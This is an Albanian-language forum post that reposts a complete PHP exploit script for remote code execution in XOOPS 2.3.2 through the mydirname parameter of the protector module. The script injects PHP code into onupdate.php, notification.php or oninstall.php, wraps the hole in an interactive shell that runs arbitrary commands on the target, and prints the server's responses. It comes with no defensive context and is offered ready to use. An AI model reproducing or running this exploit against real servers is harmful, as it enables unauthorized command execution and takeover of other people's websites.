Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi.


ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit

Shiko temën e mëparshme Shiko temën pasuese Shko poshtë 
AutoriMesazh
pRiaam
Administrator
Administrator


Postimet : 872
Vendodhja : n'Kamenic'ë
Puna / Hobi : HackinG & Designer

MesazhTitulli: XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit   Wed Feb 04, 2009 12:41 pm

#!/usr/bin/php -q
<?php

/****************************************************************
* XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit *
* by athos - staker[at]hotmail[dot]it *
* http://xoops.org *
* *
* thanks to s3rg3770 and The:Paradox *
* *
* works with register globals on *
* note: this vuln is a remote php code execution *
* *
* Directory (xoops_lib/modules/protector/) *
* onupdate.php?mydirname=a(){} [PHP CODE] function v *
* oninstall.php?mydirname=a(){} [PHP CODE] function v *
* notification.php?mydirname=a(){} [PHP CODE] function v *
****************************************************************/

error_reporting(0);

list($cli,$host,$path,$num) = $argv;

if ($argc != 4) {

print "\n+--------------------------------------------------------------+\n";
print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit |\n";
print "\r+--------------------------------------------------------------+\n";
print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n";
print "\rUsage: php xpl.php [host] [path]\n\n";
print "\rhost + localhost\n";
print "\rpath + /XOOPS\n";
exit;
}

exploit();

function exploit() {

global $num;

if ($num > 3) {
die("\n$num isn't a valid option\n");
}
else {
yeat_shell();
}
}


function yeat_shell() {

while (1) {
echo "yeat[php-shell]~$: ";
$exec = stripslashes(trim(fgets(STDIN)));

if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");

print data_exec($exec);
}
}


function data_exec($exec) {

global $host,$path,$num;

if ($num == 1) {
$urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
}

if ($num == 2) {
$urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
}

if ($num == 3) {
$urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
}

$exec = urlencode($exec);
$data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Connection: close\r\n\r\n";

$html = data_send ($host,$data);

return $html;
}


function data_send ($host,$data) {

if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!\n");
} fputs($sock,$data);

while (!feof($sock)) { $html .= fgets($sock); }

fclose($sock);
return $html;
}

_________________

Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://Deshira-Juaj.WS
 
XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit
Shiko temën e mëparshme Shiko temën pasuese Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: Shfrytëzuesit / Birucat-
Kërce tek: